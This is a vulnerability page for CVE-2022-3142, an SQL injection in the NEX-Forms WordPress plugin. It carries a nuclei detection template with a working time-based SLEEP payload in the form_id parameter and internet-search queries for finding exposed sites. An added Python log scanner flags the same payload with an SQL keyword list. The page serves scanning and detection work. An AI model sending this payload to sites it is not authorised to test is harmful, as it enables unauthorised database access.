CVE-2022-3142: NEX-Forms Plugin < 7.9.7 - SQL Injection

Date: 2025-08-01 | Affected software: NEX-Forms Plugin | PoC: public

Vulnerability description

The NEX-Forms WordPress plugin before 7.9.7 does not properly sanitise and escape user input before using it in SQL statements, leading to SQL injection. The attack can be executed by anyone who is permitted to view the forms statistics chart; by default that is administrators only, but the permission can be changed via the plugin settings.

PoC code [public]

id: CVE-2022-3142

info:
  name: NEX-Forms Plugin < 7.9.7 - SQL Injection
  author: r3Y3r53
  severity: high
  description: |
    The NEX-Forms WordPress plugin before 7.9.7 does not properly sanitise and escape user input before using it in SQL statements, leading to SQL injections. The attack can be executed by anyone who is permitted to view the forms statistics chart, by default administrators, however can be configured otherwise via the plugin settings.
  remediation: Fixed in version 7.9.7
  reference:
    - https://wpscan.com/vulnerability/8acc0fc6-efe6-4662-b9ac-6342a7823328/
    - https://www.exploit-db.com/exploits/51042
    - https://nvd.nist.gov/vuln/detail/CVE-2022-3142
    - http://packetstormsecurity.com/files/171477/WordPress-NEX-Forms-SQL-Injection.html
    - https://medium.com/%40elias.hohl/authenticated-sql-injection-vulnerability-in-nex-forms-wordpress-plugin-35b8558dd0f5
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2022-3142
    cwe-id: CWE-89
    epss-score: 0.22857
    epss-percentile: 0.95702
    cpe: cpe:2.3:a:basixonline:nex-forms:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: basixonline
    product: nex-forms
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/nex-forms-express-wp-form-builder/
    fofa-query: body=/wp-content/plugins/nex-forms-express-wp-form-builder/
    publicwww-query: /wp-content/plugins/nex-forms-express-wp-form-builder/
  tags: time-based-sqli,cve,cve2022,wpscan,packetstorm,wordpress,sqli,wp-plugin,wp,authenticated,basixonline

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        @timeout: 30s
        GET /wp-admin/admin.php?page=nex-forms-dashboard&form_id=1+AND+(SELECT+42+FROM+(SELECT(SLEEP(7)))b)-- HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration>=7'
          - 'status_code_2 == 200'
          - 'contains(body_2, "NEX-Forms")'
          - 'contains(content_type_2, "text/html")'
        condition: and
# digest: 4a0a00473045022100956d47c4d67d7f0b8824bbfc3aa9c4228f73250ceae4987387d1ea74ce7bfdd00220618f9c8b7bf33abd3c4e8c0e1cfda76a17f632515fa75330d4114e5b373c3d08:922c64590222798bb761d5b6d8e72950
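As an added example (not part of this page, the nuclei template or the plugin), the following Python flags the injection shape the template above sends, a non-numeric form_id on the nex-forms-dashboard page, when run over web-server access logs, and adds a version check against the 7.9.7 fix. The log lines are constructed, and the combined log format and SQL keyword list are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines in combined format (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Aug/2025:10:00:01 +0000] "GET /wp-admin/admin.php?page=nex-forms-dashboard&form_id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Aug/2025:10:00:09 +0000] "GET /wp-admin/admin.php?page=nex-forms-dashboard&form_id=1+AND+(SELECT+42+FROM+(SELECT(SLEEP(7)))b)-- HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Aug/2025:10:00:15 +0000] "GET /wp-admin/admin.php?page=nex-forms-dashboard&form_id=1%20AND%20SLEEP(7)%23 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.7 - - [01/Aug/2025:10:00:20 +0000] "GET /wp-admin/admin.php?page=nex-forms-entries HTTP/1.1" 200 100 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Tokens a legitimate numeric form_id never contains (assumed marker list).
SQLI_MARKERS = re.compile(r'\b(SLEEP|BENCHMARK|SELECT|UNION|AND|OR)\b|--|#|/\*', re.IGNORECASE)


def is_suspicious_form_id(path: str) -> bool:
    """True when a nex-forms-dashboard request carries a non-numeric form_id
    containing SQL syntax (the parameter abused in CVE-2022-3142)."""
    parts = urlsplit(path)
    if not parts.path.endswith("/wp-admin/admin.php"):
        return False
    qs = parse_qs(parts.query, keep_blank_values=True)  # percent- and plus-decodes
    if qs.get("page", [""])[0] != "nex-forms-dashboard":
        return False
    return any(not v.isdigit() and SQLI_MARKERS.search(v) for v in qs.get("form_id", []))


def find_sqli_attempts(log_text: str) -> list:
    """Return one record per log line that matches the injection pattern."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and is_suspicious_form_id(m["path"]):
            hits.append({"ip": m["ip"], "ts": m["ts"], "path": m["path"], "status": int(m["status"])})
    return hits


FIXED_VERSION = (7, 9, 7)  # remediation version stated on this page


def is_vulnerable_version(version: str) -> bool:
    """True for NEX-Forms versions below the 7.9.7 fix (dotted numeric versions only)."""
    return tuple(int(p) for p in version.split(".")) < FIXED_VERSION


if __name__ == "__main__":
    for hit in find_sqli_attempts(SAMPLE_LOG):
        print(hit["ts"], hit["ip"], hit["status"], hit["path"])
```

A successful time-based probe still returns 200 with the normal dashboard body, as the template's matchers show, so the request parameter rather than the response is the reliable signal in logs.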
